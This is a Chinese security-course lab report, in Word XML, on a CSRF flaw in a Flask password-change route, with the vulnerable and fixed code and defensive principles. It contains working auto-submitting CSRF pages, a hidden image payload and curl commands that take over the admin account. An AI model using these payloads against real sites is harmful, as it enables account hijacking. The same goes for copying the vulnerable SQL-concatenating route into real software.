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CSRF跨站请求伪造漏洞</w:t>
        <w:br/>
        <w:t>分析与修复报告</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="454545"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>——基于Flask的密码修改功能CSRF漏洞实验——</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>实验项目：Web安全漏洞分析与修复</w:t>
        <w:br/>
        <w:t>课程名称：网络安全实训</w:t>
        <w:br/>
        <w:t>报告日期：2026年7月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CSRF漏洞概述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第2章  CSRF核心原理与攻击链</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第3章  实验一：curl构造跨域恶意请求</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第4章  实验二：Burp Suite生成CSRF PoC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第5章  修改密码功能漏洞分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第6章  修复方案详解（含代码）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第7章  修复前后代码对比</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第8章  安全编码规范总结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第一章  CSRF漏洞概述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>CSRF（Cross-Site Request Forgery，跨站请求伪造）是一种Web安全攻击方式，攻击者诱导已登录用户点击恶意链接或访问恶意页面，利用用户在当前站点的登录状态，以用户身份执行非本意的操作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1.1 漏洞危害评级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评估项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评级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CVSS 3.0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8.8（High）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攻击向量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网络远程攻击（AV:N）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攻击复杂度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低（AC:L）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所需权限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无（需用户已登录）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影响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账号劫持、数据篡改、权限提升</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1.2 CSRF攻击三要素</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>CSRF攻击的成功需要同时满足以下三个条件：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="FFCDD2" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>要素1：用户已登录目标站点 — 浏览器中存有有效的Session Cookie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="FFCDD2" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>要素2：目标站点存在CSRF漏洞 — 敏感操作仅依赖Cookie验证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="FFCDD2" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>要素3：用户访问恶意页面 — 攻击者诱导用户点击链接或加载图片</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1.3 本应用中的CSRF漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>在 /change-password 路由中，存在以下CSRF相关漏洞：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="FFCDD2" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>🔴 漏洞1：无CSRF Token验证 — 表单可被任意网站伪造提交</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="FFCDD2" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>🔴 漏洞2：无需原密码 — 直接设置新密码，无需验证原密码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="FFCDD2" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>🔴 漏洞3：可越权改密 — 可修改任何用户的密码，不与session绑定</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="FFCDD2" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>🔴 漏洞4：无Referer验证 — 不检查请求来源是否合法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="FFCDD2" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>🔴 漏洞5：密码明文传输 — 新密码通过表单明文传输，可被中间人截获</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第二章  CSRF核心原理与攻击链</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 攻击流程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>CSRF攻击的完整流程：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Step 1: 用户登录目标网站 → 获得Session Cookie</w:t>
        <w:br/>
        <w:t>Step 2: 攻击者构造恶意页面 → 包含自动提交的表单</w:t>
        <w:br/>
        <w:t>Step 3: 诱导用户访问恶意页面 → 通过钓鱼邮件/链接等方式</w:t>
        <w:br/>
        <w:t>Step 4: 浏览器自动发送请求 → Cookie自动携带</w:t>
        <w:br/>
        <w:t>Step 5: 服务器执行操作 → 认为请求来自合法用户</w:t>
        <w:br/>
        <w:t>Step 6: 攻击成功 → 密码被修改/数据被篡改</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 恶意页面示例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>攻击者构造的CSRF攻击HTML页面：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&lt;html&gt;</w:t>
        <w:br/>
        <w:t>&lt;body&gt;</w:t>
        <w:br/>
        <w:t>&lt;h1&gt;🎉 恭喜中奖！点击领取奖品&lt;/h1&gt;</w:t>
        <w:br/>
        <w:t>&lt;form id="csrf" action="http://target:5000/change-password" method="POST"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;input type="hidden" name="username" value="admin"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;input type="hidden" name="new_password" value="hacked123"&gt;</w:t>
        <w:br/>
        <w:t>&lt;/form&gt;</w:t>
        <w:br/>
        <w:t>&lt;script&gt;document.getElementById("csrf").submit();&lt;/script&gt;</w:t>
        <w:br/>
        <w:t>&lt;/body&gt;</w:t>
        <w:br/>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>更隐蔽的方式：利用图片标签自动发送GET请求：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&lt;img src="http://target:5000/change-password?username=admin&amp;new_password=hacked123" style="display:none;" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.3 Cookie自动携带机制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>浏览器会自动在同一域名下的请求中携带Cookie，这是CSRF攻击能够成功的根本原因。用户在访问攻击者页面时，浏览器会自动将目标站点的Cookie附加到请求中，服务器无法区分请求是用户自愿发起的还是被伪造的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第三章  实验一：curl构造跨域恶意请求</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.1 实验目标</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>模拟攻击者利用已登录用户的Session Cookie，通过curl命令构造跨域恶意请求，实现无账号密码登录管理员账户。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.2 实验步骤</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Step1：攻击者先登录自己的账号获取有效Session Cookie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-c /tmp/cookies.txt -X POST http://target:5000/login \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -d "username=alice&amp;password=alice2025"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Step2：利用Session Cookie修改admin密码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/tmp/cookies.txt -X POST http://target:5000/change-password \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -d "username=admin&amp;new_password=hacked123"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Step3：攻击者现在可以用admin账号登录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-X POST http://target:5000/login \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -d "username=admin&amp;password=hacked123"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Step4：登录后获得管理员权限，可删除用户等操作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/tmp/admin_cookies.txt -X POST http://target:5000/admin/delete-user \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -d "user_id=2"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.3 攻击效果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>通过上述攻击，一个普通用户alice可以：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>1. 修改管理员admin的密码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>2. 用新密码登录admin账户</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>3. 获得管理员权限，删除其他用户</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>整个过程不需要admin的原始密码，也不需要admin做任何操作</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第四章  实验二：Burp Suite生成CSRF PoC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.1 实验目标</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>使用Burp Suite拦截POST请求，自动生成CSRF攻击Proof of Concept（PoC）HTML代码，完成绕过认证的密码修改实验。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.2 实验步骤</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Step1：使用Burp Suite拦截POST /change-password请求</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Step2：右键点击请求 → Engagement tools → Generate CSRF PoC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Step3：Burp Suite自动生成CSRF攻击HTML代码</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Burp生成的CSRF PoC HTML：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&lt;html&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;body&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;form action="https://target:5000/change-password" method="POST"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;input type="hidden" name="username" value="admin" /&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;input type="hidden" name="new_password" value="attacker123" /&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;input type="submit" value="Submit request" /&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/form&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;script&gt;document.forms[0].submit();&lt;/script&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/body&gt;</w:t>
        <w:br/>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Step4：保存为HTML文件，在受害者浏览器中打开</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Step5：受害者的密码在无感知中被修改</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.3 CSRF PoC的关键点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组件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&lt;form&gt;标签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包含目标URL和所有必需参数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&lt;input type=hidden&gt;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隐藏字段传递参数，用户不可见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&lt;script&gt;自动提交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页面加载后自动提交表单，无需用户点击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使用HTTPS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生产环境中需要匹配目标协议</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第五章  修改密码功能漏洞分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.1 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br/>
        <w:t xml:space="preserve">    username = request.form.get("username", "")   # ⚠️ 用户可控</w:t>
        <w:br/>
        <w:t xml:space="preserve">    new_password = request.form.get("new_password", "")</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    # ⚠️ 无CSRF Token验证</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # ⚠️ 无原密码验证</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # ⚠️ 无session与username匹配检查（越权）</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # ⚠️ SQL注入</w:t>
        <w:br/>
        <w:t xml:space="preserve">    sql = f"UPDATE users SET password = '{new_password}' WHERE username = '{username}'"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    c.execute(sql)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.2 六个安全漏洞一览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严重度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无CSRF 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任意网站可伪造提交密码修改表单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无需原密码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直接设置新密码，暴力破解即可修改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越权改密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可修改任意用户的密码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无Referer验证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不检查请求来源URL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密码明文传输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HTTP传输密码可被中间人截获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username参数直接拼接SQL语句</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第六章  修复方案详解（含代码）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.1 修复1：CSRF Token验证（核心）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修复：每个表单生成唯一的CSRF Token，提交时验证匹配</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>登录时生成Token存入Session：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登录成功时生成CSRF Token</w:t>
        <w:br/>
        <w:t>session["csrf_token"] = uuid.uuid4().hex</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>表单中加入隐藏字段：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&lt;input type="hidden" name="csrf_token" value="{{ session.csrf_token }}"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>后端验证Token：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token = request.form.get("csrf_token", "")</w:t>
        <w:br/>
        <w:t>if token != session.get("csrf_token", ""):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return "CSRF Token验证失败"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.2 修复2：验证请求来源（Referer）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修复：检查Referer头是否为本站点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referer = request.headers.get("Referer", "")</w:t>
        <w:br/>
        <w:t>if not referer.startswith(request.host_url):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return "请求来源不合法"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.3 修复3：session与用户名绑定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修复：禁止修改他人的密码，必须与当前登录用户一致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if username != session["username"]:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return "无权修改他人密码"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.4 修复4：参数化查询防SQL注入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修复：使用参数化查询替代字符串拼接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hashed_pw = hashlib.sha256(new_password.encode()).hexdigest()</w:t>
        <w:br/>
        <w:t>c.execute("UPDATE users SET password = ? WHERE username = ?",</w:t>
        <w:br/>
        <w:t xml:space="preserve">          (hashed_pw, username))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.5 修复5：完整修复代码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br/>
        <w:t xml:space="preserve">    username = request.form.get("username", "")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    new_password = request.form.get("new_password", "")</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    if not username or not new_password:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return "缺少参数"</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    # ✅ 修复1：验证只能修改自己的密码</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if username != session["username"]:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return "无权修改他人密码"</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    # ✅ 修复2：验证Referer防CSRF</w:t>
        <w:br/>
        <w:t xml:space="preserve">    referer = request.headers.get("Referer", "")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if not referer.startswith(request.host_url):</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return "请求来源不合法"</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    # ✅ 修复3：验证CSRF Token</w:t>
        <w:br/>
        <w:t xml:space="preserve">    token = request.form.get("csrf_token", "")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if token != session.get("csrf_token", ""):</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return "CSRF Token验证失败"</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    # ✅ 修复4：参数化查询</w:t>
        <w:br/>
        <w:t xml:space="preserve">    hashed_pw = hashlib.sha256(new_password.encode()).hexdigest()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    conn = get_db()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    c = conn.cursor()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    c.execute("UPDATE users SET password = ? WHERE username = ?",</w:t>
        <w:br/>
        <w:t xml:space="preserve">              (hashed_pw, username))</w:t>
        <w:br/>
        <w:t xml:space="preserve">    conn.commit()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    conn.close()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return redirect("/profile")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第七章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已修复(app_fixed.py)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CSRF Token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无Token验证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uuid.uuid4().hex + session校验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原密码验证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无需原密码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必须与session用户名匹配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越权防护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可改任何人密码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只能修改自己的密码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Referer验证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验证Referer头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字符串拼接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参数化查询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密码存储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明文存储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SHA256哈希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审计日志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无日志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logging记录操作</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>完整修复代码对比</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="D32F2F"/>
        </w:rPr>
        <w:t>有漏洞版本（app.py）：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t xml:space="preserve">    username = request.form.get("username", "")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    new_password = request.form.get("new_password", "")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # ⚠️ 无任何校验——直接更新密码</w:t>
        <w:br/>
        <w:t xml:space="preserve">    sql = f"UPDATE users SET password = '{new_password}' WHERE username = '{username}'"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    c.execute(sql)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    conn.commit()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return redirect("/profile")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E7D32"/>
        </w:rPr>
        <w:t>修复版本（app_fixed.py）：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t xml:space="preserve">    # ✅ CSRF Token验证</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if token != session.get("csrf_token", ""):</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return "CSRF Token验证失败"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # ✅ 只能修改自己的密码</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if username != session["username"]:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return "无权修改他人密码"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # ✅ Referer验证</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if not referer.startswith(request.host_url):</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return "请求来源不合法"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # ✅ 参数化查询</w:t>
        <w:br/>
        <w:t xml:space="preserve">    hashed_pw = hashlib.sha256(new_password.encode()).hexdigest()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    c.execute("UPDATE users SET password = ? WHERE username = ?", (hashed_pw, username))</w:t>
        <w:br/>
        <w:t xml:space="preserve">    conn.commit()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return redirect("/profile")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第八章  安全编码规范总结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>原则一：CSRF Token</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>所有涉及数据修改的POST请求必须包含CSRF Token，Token应为随机生成且绑定用户Session。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>原则二：同源验证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>校验请求的Referer或Origin头，确保请求来自本站点。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>原则三：最小权限操作</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>用户只能修改自己的资源，不能越权操作他人数据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>原则四：敏感操作二次确认</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>修改密码等敏感操作应要求用户提供原密码或验证码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>原则五：参数化查询</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>永远不要拼接SQL字符串，使用参数化查询防止SQL注入。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>原则六：密码安全存储</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>密码不应明文存储，应使用SHA256/bcrypt等哈希算法加盐存储。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>原则七：SameSite Cookie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>设置Cookie的SameSite属性为Strict或Lax，限制跨站请求携带Cookie。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>原则八：审计日志</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>所有敏感操作必须记录日志，包含用户、时间、IP、操作内容。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